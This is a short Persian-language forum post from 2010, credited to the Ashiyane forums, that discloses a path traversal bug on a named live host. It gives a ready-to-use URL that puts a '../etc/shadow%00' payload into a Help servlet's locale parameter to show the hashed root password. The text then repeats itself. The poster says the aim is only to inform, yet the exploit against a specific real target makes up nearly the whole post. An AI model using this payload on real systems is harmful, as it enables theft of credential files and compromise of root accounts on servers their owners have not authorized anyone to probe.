Masoud.B
May 21st, 2010, 02:34
دوستان این باگ رو من مدتیه میدونم خواستم بهتون معرفی کنم تا مواظب باشید
کافیه بعد از صفحه لوگین (https://www.cp.ewdx.com/single.html)
این را اضافه کنید: servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00
مثال :
https://www.cp.ewdx.com/servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00میبینید که پسورد hash شده روت رو نشون میده
هدف فقط اطلاع رسانی بود
منبع: Ashiyane (http://www.ashiyane.org/forums/)
کافیه بعد از صفحه لوگین (https://www.cp.ewdx.com/single.html)
این را اضافه کنید: servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00
مثال :
https://www.cp.ewdx.com/servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00میبینید که پسورد hash شده روت رو نشون میده
هدف فقط اطلاع رسانی بود
منبع: Ashiyane (http://www.ashiyane.org/forums/)